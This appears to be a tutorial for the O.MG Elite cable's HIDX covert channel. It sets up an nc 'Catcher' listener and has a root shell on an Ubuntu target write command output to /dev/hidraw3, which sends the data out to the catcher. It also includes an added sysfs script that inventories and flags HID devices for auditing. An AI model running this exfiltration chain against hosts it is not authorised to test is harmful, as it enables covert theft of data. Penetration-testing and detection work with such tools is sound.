HIDX StealthLink Linux Exfil
What you will need:
- A Linux "Catcher" server running nc.
- A Linux "Target" host.
- An O.MG Elite Device running the latest v3 Firmware.
- A Wireless Network accessible to both the O.MG Device and Linux "Catcher" server.
- Please ensure that you have a Linux server with nc installed and connected to your network. This will serve as our "Catcher" server. You will need a minimal understanding of Linux and the Terminal.
- Please note the IP Address of your Linux server, as you will need this later in Step 3. You can get this via the command:
  ip addr list
- Verify that your Linux server has nc installed, via the command:
  nc --version
- If your Linux server does not yet have nc installed, you may be able to install it via the command:
  sudo apt install -y netcat-traditional
  (Note: If this does not work, please review how to install software on your choice of Linux distribution. An alternative package that can be installed on most distros is nc; substitute nc with ncat if that is needed.)
- You may now start the server, via the command:
  nc -kvl 0.0.0.0 1234
- You should now see the following message to show the server has started:
  Listening on 0.0.0.0 1234
- Later in Step 3, after the O.MG Device connects to your "Catcher" server, you should see one of the two following messages:
  Connection from 192.168.2.24:53856.
  or
  Connection received on 192.168.2.24 53856
  Either message indicates a successful connection.
Please ensure that you have an O.MG Elite Device running the latest v3 Firmware. If you are not sure, please update your O.MG Device via the WebFlasher.
Connect to the WebUI of the O.MG Elite device, and click on the About button in the header bar of the page and ensure you see "Elite" in the about page.
First, you should configure your HIDX Settings.
Within the O.MG WebUI Header Bar, click on the Settings button, and then the USB button beneath.
Within the section HIDX Settings:
- Enter the Linux "Catcher" server IP Address obtained in Step 2
- Enter the Server Port Number: 1234
- Click on the HIDX AutoStart on Boot button
- Click Change Settings
You should configure your O.MG Device to connect via Station Mode to your Wireless Network.
- Within the Settings Menu, click on the NET button.
- Change the WiFi Mode to Station.
- Enter your Wireless Network's SSID and Password.
- Click "Change Settings"
Your O.MG Device will now reboot, and will attempt to join your Wireless Network. At this point, on the Linux "Catcher" server, you should see a message in your Terminal similar to this:
Client connected from: 192.168.1.151:9134
For this step, we will manually set up the Target Host to get a feel for how everything should work. Later, we will automate this process with a payload.
For this tutorial we'll be using Ubuntu 22.04; all actions need to be performed as root.
- Open Terminal
- If not already logged in as root, run:
  sudo -i
- Find the HID Device on Linux. In order to find the HID device, run the following command:
  dmesg|grep -i "D3C0:D34D" |grep hiddev|grep hidraw|tail -n1|sed -e "s/.*hidraw/hidraw/g" -e "s/:.*//g"
  (Note: You must know the Vendor ID and Product ID. This command utilizes the default Vendor and Product IDs. Adjust if needed.)
  If successful, this should result in something similar to the output below:
  hidraw3
  Use this endpoint in the next step...
- Write data to the endpoint
  ls > /dev/hidraw3
  This will not return any messages if successful.
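
The dmesg pipeline above only works while the kernel ring buffer still holds the device's enumeration line. As an added example (not part of the original guide), the script below reads the same Vendor ID and Product ID from sysfs instead, which also makes it usable for auditing a host for unexpected HID interfaces. The function names and the sample tree are constructed for illustration, and the script assumes the kernel's HID_ID field in each hidraw node's uevent file.

```shell
#!/bin/sh
# Added example, not from the original page: inventory hidraw nodes via sysfs.
# Assumes <dir>/hidrawN/device/uevent carries HID_ID=<bus>:<vendor>:<product>
# with vendor and product zero-padded to 8 hex digits.

# Print "<node> <VID:PID> <name>" for every hidraw node under $1.
hidraw_inventory() {
    dir=${1:-/sys/class/hidraw}
    for node in "$dir"/hidraw*; do
        ue="$node/device/uevent"
        [ -r "$ue" ] || continue
        id=$(sed -n 's/^HID_ID=[0-9A-Fa-f]*:0*\([0-9A-Fa-f]\{4\}\):0*\([0-9A-Fa-f]\{4\}\)$/\1:\2/p' "$ue" |
            tr 'a-f' 'A-F')
        name=$(sed -n 's/^HID_NAME=//p' "$ue")
        printf '%s %s %s\n' "${node##*/}" "${id:-unknown}" "${name:-unnamed}"
    done
}

# Print nodes whose VID:PID appears in the space-separated watchlist $1.
# Exit status is 0 when at least one node matched, 1 otherwise.
hidraw_watch() {
    watch=$(printf '%s' "$1" | tr 'a-f' 'A-F')
    hidraw_inventory "$2" | while read -r node id name; do
        for w in $watch; do
            [ "$id" = "$w" ] && printf '%s\n' "$node"
        done
    done | grep .
}

# Constructed sample tree (made-up devices) so the script runs offline.
make_sample_tree() {
    mkdir -p "$1/hidraw0/device" "$1/hidraw3/device"
    printf 'HID_ID=0003:0000046D:0000C31C\nHID_NAME=Example Keyboard\n' \
        > "$1/hidraw0/device/uevent"
    printf 'HID_ID=0003:0000D3C0:0000D34D\nHID_NAME=Example HID\n' \
        > "$1/hidraw3/device/uevent"
}

# Demo against the constructed tree; call with no directory to read /sys.
demo=$(mktemp -d)
make_sample_tree "$demo"
hidraw_inventory "$demo"
hidraw_watch "D3C0:D34D" "$demo" >/dev/null && echo "watchlisted HID interface present"
rm -rf "$demo"
```

On a real host, run hidraw_inventory with no argument to list every node under /sys/class/hidraw, or pass hidraw_watch a list of Vendor ID and Product ID pairs to flag.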
Go back to the Linux "Catcher" server, and the terminal window.
You should now see the following:
Connection received on 192.168.2.24 53856
1.txt
2.txt